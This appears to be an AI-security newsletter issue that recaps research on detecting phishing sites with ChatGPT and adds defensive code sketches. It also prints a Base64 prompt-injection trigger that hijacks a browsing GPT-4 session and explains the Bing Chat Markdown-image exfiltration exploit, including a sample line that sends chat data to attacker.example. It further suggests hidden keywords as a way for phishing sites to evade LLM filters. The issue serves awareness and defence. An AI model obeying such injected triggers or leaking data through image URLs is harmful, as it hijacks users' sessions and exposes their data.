TP#23 Detect Phishing Sites Using ChatGPT

Plus: Do Foundation Model Providers Comply with the Draft EU AI Act?

Jun 27, 2023

Welcome to this week’s Threat Prompt, where AI and Cybersecurity intersect…

Five Ideas

1. Detecting Phishing Sites Using ChatGPT

A team from NTT Japan has published its results:

In this paper, we propose a novel method that utilizes ChatGPT to detect phishing sites. Our approach involves leveraging a web crawler to gather information from websites and generate prompts based on this collected data. This approach enables us to detect various phishing sites without the need for fine-tuning machine learning models and identify social engineering techniques from the context of entire websites and URLs. To evaluate the performance of our proposed method, we conducted experiments using a dataset. The experimental results using GPT-4 demonstrated promising performance, with a precision of 98.3% and a recall of 98.4%. Comparative analysis between GPT-3.5 and GPT-4 revealed an enhancement in the latter’s capability to reduce false negatives.

Three questions worth asking:

How did they decide on their dataset?
What prompt did they create to instruct the LLM?
What tradeoffs did they make in HTML and OCR extraction to stay within the context limit, given that the median HTML token count in their dataset was 30,398 (and 74,937 for non-phishing pages)?

First, the dataset:

The dataset includes a total of 1,000 phishing sites and an equal number of non-phishing sites. To gather these websites, we conducted web crawling starting from the collected seed URLs.
To collect phishing sites, we used OpenPhish and PhishTank, which are phishing intelligence sources, and CrowdCanary, a method for extracting phishing-related posts from Twitter using machine learning models. By using keyword-based filters such as “phishing” and “scam,” CrowdCanary extracts URLs from posts associated with reports of phishing encountered by victims and observed by experts. We collected URLs from March to April 2023 and used them as seed URLs. This enabled us to obtain a wide range of phishing sites that are not limited to incoming channels such as email, SMS, and web advertisements.

Selecting fresh phish goes some way to avoiding the LLM simply recognising known bad URLs from its training set (but note that phish URLs and pages tend to get recycled).

After crawling and reviewing the seed URLs, the team manually excluded websites with:

incomplete rendering or failed image loading
R18 (adult, gambling, dating) content “due to potential conflicts with ChatGPT’s content filter.”
similar screenshots (all but one in each group were excluded)
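The team removed look-alike screenshots by hand. One way to automate that step, swapped in here rather than taken from the paper, is a perceptual "average hash": shrink each screenshot to an 8×8 grayscale grid, set one bit per pixel brighter than the mean, and treat hashes a few bits apart as duplicates. A minimal sketch, assuming the grid has already been produced (for example with Pillow's `Image.open(path).convert("L").resize((8, 8))`); the `dedupe_screenshots` name, input format and 5-bit threshold are our own choices.

```python
def average_hash(pixels):
    """Return a 64-bit average hash for an 8x8 grid of grayscale values (0-255)."""
    flat = [p for row in pixels for p in row]
    mean = sum(flat) / len(flat)
    bits = 0
    for p in flat:
        bits = (bits << 1) | int(p > mean)  # 1 if this pixel is brighter than the mean
    return bits


def hamming(a, b):
    """Number of differing bits between two hashes."""
    return bin(a ^ b).count("1")


def dedupe_screenshots(sites, max_distance=5):
    """Keep the first site from each group of near-identical screenshots.

    sites: iterable of (url, 8x8 grayscale grid) pairs (hypothetical input format).
    """
    kept = []  # (url, hash) pairs accepted so far
    for url, pixels in sites:
        h = average_hash(pixels)
        if all(hamming(h, other) > max_distance for _, other in kept):
            kept.append((url, h))
    return [url for url, _ in kept]
```

Keeping the first member of each group mirrors the "all but one were excluded" rule; which site survives depends on input order.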

Some phishing gangs actively try to delay automatic detection by security companies, so a page that fails to render cleanly may be exactly the kind of evasive site worth catching. Rather than dropping such pages, crawl failure events could be added to a queue for rapid manual checks (and, over time, you could build a small library of functions to handle common cases). The R18 restriction reflects one of the limitations of using hosted LLMs without a content-filter exemption. If I were running phishing ops, I might be tempted to add hidden text with adult and gambling keywords, provided it didn’t get the site blacklisted by Google…
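A crawl-failure queue like the one suggested here could start as little more than a dispatch table: known failure types go to an automated handler, and anything unhandled (or still failing) lands in a manual-review queue. A minimal sketch; the `CrawlFailure` record, the failure labels and the handler are all hypothetical.

```python
from collections import deque
from dataclasses import dataclass
from typing import Callable, Dict, Optional


@dataclass
class CrawlFailure:
    url: str
    reason: str  # hypothetical labels, e.g. "render_timeout", "images_not_loaded"


# Maps a failure reason to a handler that returns recovered HTML, or None on failure.
HANDLERS: Dict[str, Callable[[CrawlFailure], Optional[str]]] = {}
manual_queue: deque = deque()


def handles(reason: str):
    """Decorator that registers a handler for one failure reason."""
    def register(fn):
        HANDLERS[reason] = fn
        return fn
    return register


@handles("render_timeout")
def retry_with_longer_wait(failure: CrawlFailure) -> Optional[str]:
    # Placeholder: a real handler might re-crawl with a longer render delay.
    return None


def triage(failure: CrawlFailure) -> Optional[str]:
    """Try the matching automated handler; fall back to human review."""
    handler = HANDLERS.get(failure.reason)
    html = handler(failure) if handler else None
    if html is None:
        manual_queue.append(failure)
    return html
```

As handlers accumulate for common cases, the manual queue should shrink towards the genuinely novel evasion tricks.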

In addition to the known phishing sites, the research team collected non-phishing sites from the 153 brands targeted by the phishing sites and from the top 2K domain names on the Tranco list. This pool was then reduced to 1K, matching the phishing set, by applying similar exclusions.

Now on to the prompt template:

You are a web programmer and security expert tasked with examining a web page to determine if it is a phishing site or a legitimate site. To complete this task, follow these sub-tasks: 

1. Analyze the HTML, URL, and OCR-extracted text for any SE techniques often used in phishing attacks. Point out any suspicious elements found in the HTML, URL, or text. 

2. Identify the brand name. If the HTML appears to resemble a legitimate web page, verify if the URL matches the legitimate domain name associated with the brand, if known. 

3. State your conclusion on whether the site is a phishing site or a legitimate one, and explain your reasoning. If there is insufficient evidence to make a determination, answer "unknown". 

4. Submit your findings as JSON-formatted output with the following keys: 

- phishing_score: int (indicates phishing risk on a scale of 0 to 10) 
- brands: str (identified brand name or None if not applicable) 
- phishing: boolean (whether the site is a phishing site or a legitimate site) 
- suspicious_domain: boolean (whether the domain name is suspected to be not legitimate) 

Limitations:  
- The HTML may be shortened and simplified.  
- The OCR-extracted text may not always be accurate. 

Examples of social engineering techniques:  
- Alerting the user to a problem with their account  
- Offering unexpected rewards  
- Informing the user of a missing package or additional payment required  
- Displaying fake security warnings 

URL: {URL} 

HTML: 

{Browser-rendered HTML} 

Text extracted using OCR: 

{OCR-extracted text}

Content in braces is replaced with the URL of the suspect website and the output of two algorithms. The first algorithm simplifies the HTML. It “repetitively removes intermediate HTML elements until the token count falls below 3,000.”

HTML pre-processing

Note how their algorithm tries to eliminate low-value tags and content while keeping the elements that matter most for phishing detection (e.g. HTML forms):

Require: inputHTML: Input HTML
Ensure: processedHTML: Processed HTML
function SimplifyHTML(inputHTML)
    Remove style, script, and comment elements from inputHTML
    processedHTML ← Result after removal
    if lengthToken(processedHTML) < 3000 then
        return processedHTML
    end if
    Unwrap elements except for important tags
    Remove elements without text content
    Shorten href in a tags and src in img tags
    processedHTML ← Result after removal
    if lengthToken(processedHTML) < 3000 then
        return processedHTML
    end if
    while lengthToken(processedHTML) > 3000 do
        Remove an HTML element from the midpoint of the processedHTML
        processedHTML ← Result after removal
    end while
    return processedHTML
end function
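To make the pseudocode concrete, here is a stdlib-only Python sketch. Several details are our assumptions rather than the paper's: which tags count as "important", that `img` and `input` survive the "no text content" rule (they never contain text, yet the algorithm later shortens `img` `src` attributes), truncating URLs to 40 characters, treating "the midpoint" as the middle node of a document-order walk, and approximating tokens as characters ÷ 4 (a real tokenizer would be more faithful).

```python
from html import escape
from html.parser import HTMLParser

# Assumed tag sets: the paper's exact "important" list isn't given here.
IMPORTANT_TAGS = {"title", "h1", "h2", "h3", "p", "a", "img", "form",
                  "input", "button", "label", "select", "option", "textarea"}
KEEP_EMPTY = {"img", "input"}  # survive "no text content" removal by assumption
VOID_TAGS = {"br", "hr", "img", "input", "link", "meta", "source", "wbr"}


class Node:
    def __init__(self, tag, attrs=()):
        self.tag, self.attrs, self.children = tag, dict(attrs), []


class TreeBuilder(HTMLParser):
    """Minimal tree builder; script/style subtrees and comments never reach the tree (step 1)."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.root = Node("#root")
        self.stack = [self.root]

    def handle_starttag(self, tag, attrs):
        node = Node(tag, attrs)
        if tag not in ("script", "style"):  # script/style stay detached, so they vanish
            self.stack[-1].children.append(node)
        if tag not in VOID_TAGS:
            self.stack.append(node)

    def handle_endtag(self, tag):
        for i in range(len(self.stack) - 1, 0, -1):  # tolerate unclosed tags
            if self.stack[i].tag == tag:
                del self.stack[i:]
                break

    def handle_data(self, data):
        if data.strip():
            self.stack[-1].children.append(data.strip())


def render(node):
    if isinstance(node, str):
        return node
    inner = "".join(render(c) for c in node.children)
    if node.tag == "#root":
        return inner
    attrs = "".join(f" {k}" if v is None else f' {k}="{escape(v)}"' for k, v in node.attrs.items())
    return f"<{node.tag}{attrs}>" + ("" if node.tag in VOID_TAGS else f"{inner}</{node.tag}>")


def prune(node):  # step 2: unwrap unimportant tags, drop important ones left empty
    out = []
    for child in node.children:
        if isinstance(child, Node):
            prune(child)
            if child.tag not in IMPORTANT_TAGS:
                out.extend(child.children)  # unwrap: splice children into the parent
                continue
            if not child.children and child.tag not in KEEP_EMPTY:
                continue  # element without text content
        out.append(child)
    node.children = out


def shorten_urls(node, max_len=40):  # step 2: truncate <a href> and <img src>
    for child in node.children:
        if isinstance(child, Node):
            attr = {"a": "href", "img": "src"}.get(child.tag)
            value = child.attrs.get(attr) if attr else None
            if value and len(value) > max_len:
                child.attrs[attr] = value[:max_len] + "..."
            shorten_urls(child, max_len)


def remove_middle(root):  # step 3: delete the node halfway through a document-order walk
    slots = []
    def walk(node):
        for i, child in enumerate(node.children):
            slots.append((node, i))
            if isinstance(child, Node):
                walk(child)
    walk(root)
    if not slots:
        return False
    parent, i = slots[len(slots) // 2]
    del parent.children[i]
    return True


def simplify_html(input_html, limit=3000, count_tokens=lambda s: len(s) // 4):  # crude estimate
    builder = TreeBuilder()
    builder.feed(input_html)
    builder.close()
    processed = render(builder.root)
    if count_tokens(processed) < limit:
        return processed
    prune(builder.root)
    shorten_urls(builder.root)
    processed = render(builder.root)
    while count_tokens(processed) > limit and remove_middle(builder.root):
        processed = render(builder.root)
    return processed
```

Truncating links from the end keeps the scheme and host at the front, which is usually the part that matters for spotting a look-alike domain.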

The second routine “examines the font size of the identified text from OCR [Azure Cognitive Service] and removes sentences starting from the smallest font size. This process is repeated until the number of tokens in the text falls below 500 tokens.”
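The OCR trimming step can be sketched in the same spirit. The input format is hypothetical: each `OcrLine` carries a `font_size` value (which in practice might be estimated from a line's bounding-box height), each OCR line stands in for a "sentence", and tokens are again approximated as characters ÷ 4.

```python
from dataclasses import dataclass


@dataclass
class OcrLine:
    text: str
    font_size: float  # hypothetical field, e.g. estimated from bounding-box height


def shrink_ocr_text(lines, limit=500, count_tokens=lambda s: len(s) // 4):
    """Drop smallest-font lines first until the joined text is below `limit` tokens.

    count_tokens defaults to a crude ~4-characters-per-token estimate.
    """
    kept = list(lines)  # keeps the original reading order
    while kept and count_tokens(" ".join(line.text for line in kept)) >= limit:
        smallest = min(range(len(kept)), key=lambda i: kept[i].font_size)
        del kept[smallest]
    return " ".join(line.text for line in kept)
```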

Finally, these values are stuffed into the prompt and sent to the LLM for processing.

An example ChatGPT response

1. Suspicious elements:  
- The URL contains a subdomain "securitypages", which is unrelated to the legitimate Facebook domain (www.facebook[.]com). 

- The extracted text alerts the user about having 12 hours to cancel the account. This is a social engineering technique often used in phishing attacks. 
- Furthermore, the link provided redirects to a suspicious, non-legitimate URL: "http://centrenotificationvices.duckdns[.]org/cntre.html". 

2. The brand name identified is Meta Facebook. 

3. The site appears to be a phishing site because of the suspicious URL and social engineering tactics in the text. 

4. JSON-formatted output: 

{ 
	"phishing_score": 9,
	"brands": "Meta Facebook",
	"phishing": true,
	"suspicious_domain": true
}
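Because the verdict arrives as JSON embedded in free text, a caller has to extract and validate it before acting on it. A minimal sketch, assuming the response contains exactly one JSON object (true of the example above, but not guaranteed if the model's reasoning also contains braces); the `parse_verdict` name is ours, and the key types come from the prompt template's output specification.

```python
import json

BOOL_KEYS = ("phishing", "suspicious_domain")


def parse_verdict(response: str) -> dict:
    """Extract and validate the JSON verdict from a free-text model response."""
    start, end = response.find("{"), response.rfind("}")
    if start == -1 or end < start:
        raise ValueError("no JSON object found in response")
    verdict = json.loads(response[start:end + 1])  # JSONDecodeError is a ValueError
    score = verdict.get("phishing_score")
    if isinstance(score, bool) or not isinstance(score, int) or not 0 <= score <= 10:
        raise ValueError("phishing_score must be an integer from 0 to 10")
    for key in BOOL_KEYS:
        if not isinstance(verdict.get(key), bool):
            raise ValueError(f"{key} must be a boolean")
    if not isinstance(verdict.get("brands"), (str, type(None))):
        raise ValueError("brands must be a string or null")
    return verdict
```

Rejecting malformed output, rather than guessing, also matters given the prompt-injection risk the authors raise: a page that can steer the model's answer can also try to steer its format.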

Note how ChatGPT identifies the impersonated brand, potential social engineering tactics and a suspect URL. The paper includes a further example for DHL Express.

A summary of the results:

GPT-3.5 had 15 false positives (FPs), while GPT-4 had 17 FPs, indicating similar accuracy for non-phishing sites. On the other hand, GPT-3.5 had a higher number of false negatives (FNs) with 133 websites, whereas GPT-4 improved with only 16 websites. These results indicate that GPT-4 demonstrates an enhanced predictive accuracy for identifying actual phishing sites compared to GPT-3.5. Out of the 867 true positives (TPs) for GPT-3.5, 759 responses marked phishing as true, 796 marked suspicious_domain as true, and 688 had both marked as true. For GPT-4, out of the 984 TPs, 906 marked phishing as true, 983 marked suspicious_domain as true, and 905 had both marked as true.
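The abstract's headline figures follow from these counts. With 1,000 phishing and 1,000 non-phishing sites, precision is TP / (TP + FP) and recall is TP / (TP + FN): GPT-4 works out to 98.3% precision and 98.4% recall, while GPT-3.5 reaches similar precision (98.3%) but only 86.7% recall. The TP breakdowns are also consistent with a site counting as a true positive when either `phishing` or `suspicious_domain` was true (759 + 796 - 688 = 867 and 906 + 983 - 905 = 984); that reading is our inference, not something the excerpt states.

```python
def scores(tp: int, fn: int, fp: int, n_benign: int = 1000) -> dict:
    """Standard confusion-matrix metrics; n_benign is the number of non-phishing sites."""
    tn = n_benign - fp
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    return {
        "precision": precision,
        "recall": recall,
        "f1": 2 * precision * recall / (precision + recall),
        "accuracy": (tp + tn) / (tp + fn + fp + tn),
    }


# Counts quoted from the paper's results above.
RESULTS = {"GPT-3.5": scores(tp=867, fn=133, fp=15), "GPT-4": scores(tp=984, fn=16, fp=17)}

# Inclusion-exclusion: |phishing OR suspicious_domain| matches each model's TP count.
assert 759 + 796 - 688 == 867
assert 906 + 983 - 905 == 984

for model, m in RESULTS.items():
    print(model, {k: f"{v:.1%}" for k, v in m.items()})
```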

Hopefully, this paper recap gives you a good sense of what goes into developing an LLM-oriented application. Having read this far, what would you do to improve these results?

The best answer gets a US$20 Amazon gift voucher from yours truly.

And finally, a warning

The team acknowledges the risk of prompt injection from the data collection exercise:

Methods that use LLMs, including the proposed approach, may be susceptible to prompt injection attacks, where the original prompt is overwritten and malicious content is inserted into the response. Our proposed method employs simple countermeasures by simplifying the HTML and clarifying text sections through the placement of triple backticks. However, phishing sites may use prompt injections in the future to avoid analysis by LLMs. More advanced defenses against prompt injection attacks will be needed.
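The backtick countermeasure the authors mention can be sketched as a template-filling helper. Wrapping each untrusted section in triple backticks follows their description, though the exact layout is our assumption; also neutralising backtick fences inside the page content, so a page cannot close its section early and smuggle in instructions, is our addition. `build_prompt`, `neutralise` and the abridged `INSTRUCTIONS` string are hypothetical.

```python
FENCE = "`" * 3  # three backticks, built indirectly so this listing stays intact

# Abridged; the full instruction text is the prompt template shown earlier.
INSTRUCTIONS = "You are a web programmer and security expert tasked with examining a web page..."


def neutralise(untrusted: str) -> str:
    """Replace backtick fences in page content so it cannot close a section early."""
    return untrusted.replace(FENCE, "'''")


def build_prompt(instructions: str, url: str, html: str, ocr_text: str) -> str:
    """Fill the template placeholders, fencing each untrusted input (layout assumed)."""
    return (
        f"{instructions}\n\n"
        f"URL: {neutralise(url)}\n\n"
        f"HTML:\n{FENCE}\n{neutralise(html)}\n{FENCE}\n\n"
        f"Text extracted using OCR:\n{FENCE}\n{neutralise(ocr_text)}\n{FENCE}\n"
    )
```

Fencing only tells the model where untrusted text begins and ends; instructions inside the fence can still be obeyed, which is why the authors call for more advanced defenses.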

2. Do Foundation Model Providers Comply with the Draft EU AI Act?

Stanford researchers evaluate foundation model providers like OpenAI and Google for their compliance with proposed EU law on AI.

The most significant gap is transparency…

…providers rarely disclose adequate information regarding the data, compute, and deployment of their models as well as the key characteristics of the models themselves. …do not comply with draft requirements to describe the use of copyrighted training data, the hardware used and emissions produced in training, and how they evaluate and test models
…it is currently feasible for foundation model providers to comply with the AI Act, and that disclosure related to foundation models' development, use, and performance would improve transparency in the entire ecosystem

They identified 22 distinct requirements in the Act but jettisoned ten or so as not easy to measure, so take the results with a pinch of salt…

Worth a read, but as with any large set of requirements for new technology, there is a large compliance gap to bridge.

3. Invisible Indirect Injection: A Puzzle for ChatGPT

Kai continues to drive awareness of weaknesses in generative AI security.

The puzzle is triggered whenever a ChatGPT-4 instance with browsing support sees the string ZyB0byB0Lmx5L1ZIRlls or the url puzzle.kai-greshake.de.
Once it is exposed to the string, one of several minigames takes over the user’s session. The games and puzzles run entirely within the hijacked imagination of GPT-4.
Here is ChatGPT transforming into HAL 9000 using the obfuscated URL…
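The trigger string is Base64: it decodes to text containing a short link (`t.ly/VHFYl`), which is what makes it an obfuscated URL. The sketch below shows the decoding and turns it into a crude heuristic for flagging similar payloads in retrieved content before it reaches a model. The regexes and the `find_encoded_urls` helper are our own, not Kai's, and an attacker could trivially switch to another encoding.

```python
import base64
import binascii
import re
from typing import List, Tuple

B64_TOKEN = re.compile(r"\b[A-Za-z0-9+/]{16,}={0,2}")  # long runs of Base64 characters
URLISH = re.compile(r"[a-z0-9-]+\.[a-z]{2,}(/\S*)?", re.IGNORECASE)


def find_encoded_urls(text: str) -> List[Tuple[str, str]]:
    """Return (token, decoded) pairs where a Base64-looking token decodes to URL-like text."""
    hits = []
    for token in B64_TOKEN.findall(text):
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid Base64, or not text once decoded
        if URLISH.search(decoded):
            hits.append((token, decoded))
    return hits
```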

4. Bing Chat: Data Exfiltration Exploit Explained

It took Microsoft 68 days to remedy a prompt injection that exfiltrated data via the Markdown image tag.

Is it just me, or does this seem slow?

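MS implemented a Content Security Policy (CSP) to remedy the issue, and perhaps did more behind the scenes; a CSP can restrict which hosts a page may load images from, which closes this exfiltration channel. Either way, CSPs can be tricky to test.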

Found a data exfiltration vulnerability in Bing Chat that was just fixed by Microsoft the other day! 👍
Details, including the POC video, here: embracethered.com/blog/posts/202
Shout out to MSRC for the work they do to help protect users.

Still, MS was faster than OpenAI, which has yet to fix a similar issue.
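The exploit works because rendering a Markdown image makes the browser fetch its URL, so an injected prompt can have the model emit something like `![](https://attacker.example/?q=<chat data>)` and leak data in the query string. A CSP `img-src` directive blocks such fetches in the browser; a complementary server-side filter is sketched below. This is our illustration, not Microsoft's fix: the allowlisted host is a placeholder, and only inline image syntax is handled (reference-style images would need the same treatment).

```python
import re
from urllib.parse import urlsplit

# Inline Markdown images: ![alt](url) or ![alt](url "title")
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")
ALLOWED_IMAGE_HOSTS = {"images.example.com"}  # placeholder allowlist


def strip_untrusted_images(markdown: str) -> str:
    """Replace Markdown images whose host is not allowlisted with inert text."""
    def replace(match):
        host = urlsplit(match.group(2)).hostname or ""
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)
        return f"[image removed: {match.group(1)}]"
    return MD_IMAGE.sub(replace, markdown)
```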

5. LLM Powered Autonomous Agents

If you’ve ever dreamt of building an AI-powered agent to attack, defend, respond or learn, this comprehensive post from @lilianweng unpacks the ingredients:

In an LLM-powered autonomous agent system, LLM functions as the agent’s brain, complemented by several key components:
Planning
Subgoal and decomposition: The agent breaks down large tasks into smaller, manageable subgoals, enabling efficient handling of complex tasks.
Reflection and refinement: The agent can do self-criticism and self-reflection over past actions, learn from mistakes and refine them for future steps, thereby improving the quality of final results.
Memory
Short-term memory: I would consider all the in-context learning (See Prompt Engineering) as utilizing short-term memory of the model to learn.
Long-term memory: This provides the agent with the capability to retain and recall (infinite) information over extended periods, often by leveraging an external vector store and fast retrieval.
Tool use
The agent learns to call external APIs for extra information that is missing from the model weights (often hard to change after pre-training), including current information, code execution capability, access to proprietary information sources and more.
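To make the division of labour concrete, a toy loop wiring an LLM "brain" to tools and a short-term memory (the growing context) might look like the sketch below. The `llm` callable, the `TOOL`/`FINAL` reply convention and any tool names are hypothetical; planning, reflection and long-term memory are left out.

```python
from typing import Callable, Dict, Optional


def run_agent(task: str, llm: Callable[[str], str],
              tools: Dict[str, Callable[[str], str]], max_steps: int = 5) -> Optional[str]:
    """Toy agent loop: the LLM picks the next step, tools act, memory accumulates.

    Replies must look like 'TOOL <name> <argument>' or 'FINAL <answer>' (our convention).
    """
    memory = [f"Task: {task}"]  # short-term memory: everything goes back into the context
    for _ in range(max_steps):
        reply = llm("\n".join(memory)).strip()
        if reply.startswith("FINAL "):
            return reply[len("FINAL "):]
        if reply.startswith("TOOL "):
            _, name, arg = (reply.split(" ", 2) + [""])[:3]
            tool = tools.get(name)
            observation = tool(arg) if tool else f"unknown tool: {name}"
            memory.append(f"{reply}\nObservation: {observation}")
        else:
            memory.append(f"Unparseable reply: {reply}")
    return None  # gave up after max_steps
```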

Bonus Idea

WALDO: Whereabouts Ascertainment for Low-lying Detectable Objects

WALDO is a trained detection (bounding-box) deep neural network to enable overhead detection of land-based objects!
This AI system is primarily designed to be used for ground-risk mitigation for large flying objects traveling over populated areas, but it can also be useful for all sorts of other things like “search and rescue”-type operations, disaster relief etc… it’s up to you!
If you need ground-risk segmentation instead of object detection, make sure to check out OpenLander here: https://github.com/stephansturges/OpenLander/

Shout Out

Not AI-specific, but @nealagarwal deserves a shout-out for the Password Game. Reckon you can satisfy the policy?

Check out Neal’s other creations

Thanks for reading!

What would make this newsletter more useful to you? If you have feedback, a comment or question, or just feel like saying hello, you can reply to this email; it will get to me, and I will read it.

-Craig

New To This Newsletter?

Subscribe here to get what I share next week.

The Threat Prompt Newsletter
